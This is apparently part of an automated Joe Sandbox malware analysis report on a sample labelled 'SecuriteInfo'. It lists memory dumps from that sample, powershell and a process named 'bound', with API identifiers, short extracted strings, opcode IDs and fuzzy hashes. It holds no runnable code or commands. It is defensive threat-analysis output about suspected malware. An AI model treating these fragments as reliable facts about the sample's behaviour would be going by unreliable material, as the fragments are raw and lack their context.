                                                                                                                                                                                                                              • Associated: 00000002.00000002.1490107533.00007FF8E7AA3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1490107533.00007FF8E7AA5000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1490107533.00007FF8E7ACD000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1490107533.00007FF8E7AD8000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1490107533.00007FF8E7AE3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1493021775.00007FF8E7AE7000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1493179025.00007FF8E7AE9000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff8e7a20000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Time$System$File
                                                                                                                                                                                                                              • String ID: gfff
                                                                                                                                                                                                                              • API String ID: 2838179519-1553575800
                                                                                                                                                                                                                              • Opcode ID: a0b97f4aea56fea0423c07e2c95279f2c9599c66744ee81c656443d2e1a48d07
                                                                                                                                                                                                                              • Instruction ID: 28636ee2310a762c2f74da2b60308a4c5758b4675ba16397bb5dacc91cdfd48e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a0b97f4aea56fea0423c07e2c95279f2c9599c66744ee81c656443d2e1a48d07
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E721E672B0868686EB94CFA9D40277D76E4E788BC8F448035EA5DC7795DE3CD1418702
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1469032874.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1467847222.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469085811.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD41000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469304096.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentDirectory
                                                                                                                                                                                                                              • String ID: :
                                                                                                                                                                                                                              • API String ID: 1611563598-336475711
                                                                                                                                                                                                                              • Opcode ID: e8d367c4ea258391d160676196091cc4497c978f166048fd005a5cb1bdaac227
                                                                                                                                                                                                                              • Instruction ID: e5a636bf4574df351d9f193d1bc54ae2bd4c38df9f6831aaec94935af671b0e1
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e8d367c4ea258391d160676196091cc4497c978f166048fd005a5cb1bdaac227
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9421C362B0864181FB20EB21D04436DA3E1FBA8B44FC5417BD69D43698DF7CE545CB62
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1469032874.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1467847222.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469085811.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD41000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469304096.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                                                              • String ID: csm
                                                                                                                                                                                                                              • API String ID: 2573137834-1018135373
                                                                                                                                                                                                                              • Opcode ID: b596af9f6a60738c50b353da5cbad86497326ffe12a5eabfdc94c01c9dae4a3e
                                                                                                                                                                                                                              • Instruction ID: 0f7d24ecbdfb765eea94364325dd8b81555a85adc87ed2c9e4b4c66f6e34aa2a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b596af9f6a60738c50b353da5cbad86497326ffe12a5eabfdc94c01c9dae4a3e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5E112E32618B8182EB61DF15E44035AB7E5FB88B98F684671DB8D07758DF3CD551CB10
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1469032874.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1467847222.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469085811.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD41000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469304096.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: DriveType_invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID: :
                                                                                                                                                                                                                              • API String ID: 2595371189-336475711
• Opcode ID: 68237dfdc7112287ec82a3b365f776b5c9f6f856de5878160eaa1a8f91e0357f
• Instruction ID: 6ac71f684b0196dc91a5adc0b388a21a3753f3f1d86e1d51e424bfae0a360557
• Opcode Fuzzy Hash: 68237dfdc7112287ec82a3b365f776b5c9f6f856de5878160eaa1a8f91e0357f
• Instruction Fuzzy Hash: 0F018F6291C20686F721FF60946537EA3A0EF58745FC10077D54D83699DE7CE904CB36
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.1490107533.00007FF8E7A21000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8E7A20000, based on PE: true
• Associated: 00000002.00000002.1489932395.00007FF8E7A20000.00000002.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.1490107533.00007FF8E7AA3000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.1490107533.00007FF8E7AA5000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.1490107533.00007FF8E7ACD000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.1490107533.00007FF8E7AD8000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.1490107533.00007FF8E7AE3000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.1493021775.00007FF8E7AE7000.00000080.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.1493179025.00007FF8E7AE9000.00000004.00000001.01000000.00000010.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff8e7a20000_SecuriteInfo.jbxd
Similarity
• API ID: Time$System$File
• String ID: gfff
• API String ID: 2838179519-1553575800
• Opcode ID: e25ff0695230b9ef20f6353c867282db066572866cf8b2610bfc2824b0035600
• Instruction ID: c772caa4f23d2346ca0b86c61077fe05ecd15184b6b6497cd99e8f35bee746b1
• Opcode Fuzzy Hash: e25ff0695230b9ef20f6353c867282db066572866cf8b2610bfc2824b0035600
• Instruction Fuzzy Hash: 3C01D6E2B1864582EB60DB6AF80225967D1FBCC7C8F449032E75DCBB65EE2CD2018B01
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.1496149556.00007FF8E8131000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8E8130000, based on PE: true
• Associated: 00000002.00000002.1495728438.00007FF8E8130000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000002.00000002.1496149556.00007FF8E8141000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000002.00000002.1496149556.00007FF8E8143000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000002.00000002.1496149556.00007FF8E8146000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000002.00000002.1496995524.00007FF8E8147000.00000080.00000001.01000000.0000000C.sdmp
• Associated: 00000002.00000002.1497677293.00007FF8E8148000.00000004.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff8e8130000_SecuriteInfo.jbxd
Similarity
• API ID: getprotobyname
• String ID: protocol not found$s:getprotobyname
• API String ID: 402843736-630402058
• Opcode ID: bd65c5a6a88a43393fd174900b5279529262fcd64829d65dad74d3ec7435cd69
• Instruction ID: b394b34595add3da25030ec67a1c404293b37e70ab9279fb48a439a5f77c54cc
• Opcode Fuzzy Hash: bd65c5a6a88a43393fd174900b5279529262fcd64829d65dad74d3ec7435cd69
• Instruction Fuzzy Hash: 08012C25A1CB4282EA109BA1E98467D63A0FF8ABD5F460831CA4E47B14DF3CE448C70A
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.1496149556.00007FF8E8131000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8E8130000, based on PE: true
• Associated: 00000002.00000002.1495728438.00007FF8E8130000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000002.00000002.1496149556.00007FF8E8141000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000002.00000002.1496149556.00007FF8E8143000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000002.00000002.1496149556.00007FF8E8146000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000002.00000002.1496995524.00007FF8E8147000.00000080.00000001.01000000.0000000C.sdmp
• Associated: 00000002.00000002.1497677293.00007FF8E8148000.00000004.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff8e8130000_SecuriteInfo.jbxd
Similarity
• API ID: inet_addr
• String ID: 255.255.255.255$illegal IP address string passed to inet_aton
• API String ID: 1393076350-3844699235
• Opcode ID: 228bed37441ba182da163e3ec653cc393a3f059738861f4e152d049502361bed
• Instruction ID: 458f4b1894a1e524c85def6b8c0a747f48e03447201c99f6ef8479169cc4e112
• Opcode Fuzzy Hash: 228bed37441ba182da163e3ec653cc393a3f059738861f4e152d049502361bed
• Instruction Fuzzy Hash: D1F062A0A1CA4292EA109BB1F84427D2361AF85BE0F511231E92E466E0DF3CD088C70A
Strings
Memory Dump Source
• Source File: 0000000B.00000002.1546431489.00007FF886830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886830000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_7ff886830000_powershell.jbxd
Similarity
• API ID:
• String ID: (7(k
• API String ID: 0-3806051746
• Opcode ID: 6f18a2a2409ba23e3b6d7d154033bbf679fb813a46419400f71b06805e33fe09
• Instruction ID: d1dae1ef7d8bfbbe98e0a09bff2d61409b78defda4047ea2f8557cb8e7a39d04
• Opcode Fuzzy Hash: 6f18a2a2409ba23e3b6d7d154033bbf679fb813a46419400f71b06805e33fe09
• Instruction Fuzzy Hash: 4782E222E0DBCB4FE3969A2859655B47BE1FF5A7A0F1902FBC08DC7193D9189C06C352
Strings
Memory Dump Source
• Source File: 0000000B.00000002.1546431489.00007FF886830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886830000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_7ff886830000_powershell.jbxd
Similarity
• API ID:
• String ID: X7(k
• API String ID: 0-2313428286
• Opcode ID: 0bde99f6abb225ad5a5761bde1bff5cdc0349949c2a1e67445936cdb58d1d0c4
• Instruction ID: 5ad618b1d2e1915f20c14b48d285cf473b3e3aac83cf12728673b1b7baa5a6bf
• Opcode Fuzzy Hash: 0bde99f6abb225ad5a5761bde1bff5cdc0349949c2a1e67445936cdb58d1d0c4
• Instruction Fuzzy Hash: E0D1F721E0DA8B4FE7969B6C48659B5BBE0FF5A390F1801FED44DCB093D918AC85C352
Strings
Memory Dump Source
• Source File: 0000000B.00000002.1543807986.00007FF886760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886760000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_7ff886760000_powershell.jbxd
Similarity
• API ID:
• String ID: SR_H
• API String ID: 0-3537898935
• Opcode ID: 718e3b1110a5f40b5c9f94a7936f1fa4ca1547bd8425c0f7caa81dab3b78c0ff
• Instruction ID: 77a10931d63802d3c291b5ffe7b1ff14e0d840d88a92cc734a2e7826d00c2568
• Opcode Fuzzy Hash: 718e3b1110a5f40b5c9f94a7936f1fa4ca1547bd8425c0f7caa81dab3b78c0ff
• Instruction Fuzzy Hash: DBB13932A0CA958FE746EA1C84B55E47BE1FF52760F1842BEC189CB193EE257816C7C1
Strings
Memory Dump Source
• Source File: 0000000B.00000002.1543807986.00007FF886760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886760000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_7ff886760000_powershell.jbxd
Similarity
• API ID:
• String ID: Kfs
• API String ID: 0-118685348
• Opcode ID: 90e73baad9fd6efa86b5ea97b90a716bfa81ada7a4c1f0c5f9c5c23710fb93a8
• Instruction ID: 138253b875fbfbb3e91a6ecbfa3a80b183a392e4514288faedf4ab88bd0c0505
• Opcode Fuzzy Hash: 90e73baad9fd6efa86b5ea97b90a716bfa81ada7a4c1f0c5f9c5c23710fb93a8
• Instruction Fuzzy Hash: E1419023E0E6D64EEB43A76868751F67FA0FF53254B0942F7D088CB093E9196909C3C2
Strings
Memory Dump Source
• Source File: 0000000B.00000002.1540335231.00007FF88664D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF88664D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_7ff88664d000_powershell.jbxd
Similarity
• API ID:
• String ID: xrB
• API String ID: 0-2425350093
• Opcode ID: 6050160b71714ca60efe219cb34dd0e920e2d061e4a2d8bc3d35c7f06290a7f7
• Instruction ID: 376fa8005dc35531dcae2d37c357873f5cdf4e0628c163004ea9c222d4d9c97d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6050160b71714ca60efe219cb34dd0e920e2d061e4a2d8bc3d35c7f06290a7f7
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9841057180DBC44FE756DB29A8558523FF0FF52260B1905EFD088CB1A3D624AC86C762
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1543807986.00007FF886760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886760000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff886760000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 850cd7204762d9d80bfafd5e2b87f1363ab60c4ebaba0ff5fed33b3cdb614026
                                                                                                                                                                                                                              • Instruction ID: d5e8bcca0c3dfa88756acd4f4581ca90650ab7c49d2b57c4f68ae5b5985abeb8
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 850cd7204762d9d80bfafd5e2b87f1363ab60c4ebaba0ff5fed33b3cdb614026
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5631E53191CB888FDB589B5CA8466A97BF0FB99310F00426FE449D3292DA70AC15CBC2
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1546431489.00007FF886830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886830000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff886830000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 5efb27feee0b16f1ee362c45330fabaee3761294bda91974dc5b4bdbbc87a2fa
                                                                                                                                                                                                                              • Instruction ID: de498ed2fc519a85cc982ed58ef4f1850080b80309059015507c69500d44f0f1
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5efb27feee0b16f1ee362c45330fabaee3761294bda91974dc5b4bdbbc87a2fa
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3821F232F0DA874FE3A9DA28966057466D1FF4C390FA901BAC00EC71A2DE28EC45C741
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1546431489.00007FF886830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886830000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff886830000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: b07f866d78660f7abf2ad80766f53959a26aee0f1c8c052453158fb4660ddc17
                                                                                                                                                                                                                              • Instruction ID: 4483367d6759d6ddc5c9941e40b0a941c9d25584eaec35e4b593ea3d80b6f572
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b07f866d78660f7abf2ad80766f53959a26aee0f1c8c052453158fb4660ddc17
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 98112132F0E9874FE3A6DB2895605B877E0FF087A0F5901BAD15EC7097EA18AC55C781
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1543807986.00007FF886760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886760000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff886760000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                                                                                                                                              • Instruction ID: 5c69d1b182ff29aad37d74fbb171a4c525eef3961644124469c2ab0a3353ca0e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C701A73110CB0C4FD744EF0CE051AA5B3E0FB95360F10056DE58AC3651DA36E882CB42
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1543807986.00007FF886760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886760000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff886760000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: b18c5b4403144125643aa94798421553d35c8d2e07a4de8a7a6345a01da5d54b
                                                                                                                                                                                                                              • Instruction ID: c4e35dde06a2f9fd9186a5d528d3d39bc27d1f1c00a9ef893188da56bc068c19
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b18c5b4403144125643aa94798421553d35c8d2e07a4de8a7a6345a01da5d54b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DFF0303275C6044FDB4CEA1CF852DB573E1E7D9334B10026EE48BC2656D926E847C686
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1543807986.00007FF886760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886760000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff886760000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 58b30047d7e44f079066e9e7afbe79efcaf13536441b5f12f160c6d55ce256cb
                                                                                                                                                                                                                              • Instruction ID: 38cb8282c5407151de2201f6d04f3ee483cc720ff9c0ee405698968afa7c8e50
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 58b30047d7e44f079066e9e7afbe79efcaf13536441b5f12f160c6d55ce256cb
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 56F0373275C6044FDB4CAA1CF8529B573D1E799320B10016EE48BC2696D917F842C685
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1543807986.00007FF886760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886760000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff886760000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: M_^6$M_^<$M_^F$M_^I$M_^J
                                                                                                                                                                                                                              • API String ID: 0-1500707516
                                                                                                                                                                                                                              • Opcode ID: 041ac91ce1e2f866d46e9f53b52ae62d15ede3fa734e511d0ac2dfddc52e60c4
                                                                                                                                                                                                                              • Instruction ID: a2d9ee7be2281fb38b7a3aa5b14e395de017defeb1d529274164f6058e48bbdc
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 041ac91ce1e2f866d46e9f53b52ae62d15ede3fa734e511d0ac2dfddc52e60c4
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 652105777084669ED30276ADB864ADC7380DBA46B638A47B3E258CF543FD18A08786D1
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1543807986.00007FF886760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886760000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff886760000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: M_^$M_^$M_^$M_^$M_^
                                                                                                                                                                                                                              • API String ID: 0-679677686
                                                                                                                                                                                                                              • Opcode ID: 6578915fc91fb94ecd6f914bb74461aeb77435cbfe520801d496b6ecb692bb83
                                                                                                                                                                                                                              • Instruction ID: cd6f54e4b311aa8f9029391a3f116ba66bb9897c124efd1fc38fc1f7869a6a93
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6578915fc91fb94ecd6f914bb74461aeb77435cbfe520801d496b6ecb692bb83
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A53172A3A0E6D59FE717566848B90D53FD0FF12258B0E02F6C8D88F1A3FD58290AC291
                                                                                                                                                                                                                              Strings
Memory Dump Source
• Source File: 0000000B.00000002.1543807986.00007FF886760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886760000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_7ff886760000_powershell.jbxd
Similarity
• API ID:
• String ID: M_^$M_^$M_^$M_^
• API String ID: 0-1397233021
• Opcode ID: 5ce95b20ca1fda97b254bb0081d972034d579d739c8b849da8a4253fac1cb583
• Instruction ID: dfa932f377910ad4e41640966d2dfd512709635714ddbf1b3a5bfc079146dbf2
• Opcode Fuzzy Hash: 5ce95b20ca1fda97b254bb0081d972034d579d739c8b849da8a4253fac1cb583
• Instruction Fuzzy Hash: 55417396A0E6D25FF35752284879195BFA0FF52258B4D03F6C4C88F0E3FD592847D2A2
Strings
Memory Dump Source
• Source File: 00000011.00000002.1612635665.00007FF886760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886760000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_7ff886760000_bound.jbxd
Similarity
• API ID:
• String ID: }f$8hf$vX_H$yX_H
• API String ID: 0-1268338001
• Opcode ID: fe4a78b987730ad11f56939d775cd190225a535ca8bc2e134aa93bbae7dea302
• Instruction ID: 14bf443520310830fbd92e29abb061ba91c123365dd0fddcccf3c8fbc99fce30
• Opcode Fuzzy Hash: fe4a78b987730ad11f56939d775cd190225a535ca8bc2e134aa93bbae7dea302
• Instruction Fuzzy Hash: 8A12EF71D1895D8BEBA8EB58D8A97A9B3F1FB58750F1002F5D00DD3292DE346D82CB41
Strings
Memory Dump Source
• Source File: 00000011.00000002.1612635665.00007FF886760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886760000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_7ff886760000_bound.jbxd
Similarity
• API ID:
• String ID: b4d$b4d
• API String ID: 0-1613134983
• Opcode ID: f61792fd54b31067f98ab1a21e1a8fcbbaa474850444b06dfe35265b722eb97b
• Instruction ID: e508413ec08ab4a2dc11158b492e98e2ecd2ae1de289f152aac5f8d370e2e740
• Opcode Fuzzy Hash: f61792fd54b31067f98ab1a21e1a8fcbbaa474850444b06dfe35265b722eb97b
• Instruction Fuzzy Hash: CD914431A18B4A8FD358EE2894A55B573D2FFA5760B14477ED08AC3282DE28FC42C781
Strings
Memory Dump Source
• Source File: 00000011.00000002.1612635665.00007FF886760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886760000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_7ff886760000_bound.jbxd
Similarity
• API ID:
• String ID: `on
• API String ID: 0-228467854
• Opcode ID: 9cf60d12839c69bd4d69e11eda310a2974f66f3d2c6d65140ce1441146c27ccb
• Instruction ID: 07810de896be061995f4160afec57a0dca8e049756b36dd5722013bc17bb4c1e
• Opcode Fuzzy Hash: 9cf60d12839c69bd4d69e11eda310a2974f66f3d2c6d65140ce1441146c27ccb
• Instruction Fuzzy Hash: 6E611130609A454FD758EB28C4A5AB6B7E1FF99350F20467ED04AC7292EE24FC46CBC1
Memory Dump Source
• Source File: 00000011.00000002.1612635665.00007FF886760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886760000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_7ff886760000_bound.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 03c2afbf5fb8a72f5e1827540af886ca90128fac0de00d6260b077838e33252d
• Instruction ID: 90dc0af8004e1894621f92f4beda2e8ad33744eaf3f36fda70f2bef545f493da
• Opcode Fuzzy Hash: 03c2afbf5fb8a72f5e1827540af886ca90128fac0de00d6260b077838e33252d
• Instruction Fuzzy Hash: 23C12821E1DACA4FE795EB6854756B83BD1FF9A2A4B0C02B9D44DC72D3DE189C02C381
Memory Dump Source
• Source File: 00000011.00000002.1612635665.00007FF886760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886760000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_7ff886760000_bound.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 682b2da0faad58eb030bfc1284b6061860caf98a6c44dfa60e58280ddde27eac
• Instruction ID: b453796c73648713b8cbd5dc1fa130bc1026c767ee92292b388cca26a74db9e9
• Opcode Fuzzy Hash: 682b2da0faad58eb030bfc1284b6061860caf98a6c44dfa60e58280ddde27eac
• Instruction Fuzzy Hash: 4E819D6190EBC64FD3579B3848749A17FB0AF5729071D46EBC4D8CB1E3DA1CA80AC762
Memory Dump Source
• Source File: 00000011.00000002.1612635665.00007FF886760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886760000, based on PE: false
Joe Sandbox IDA Plugin
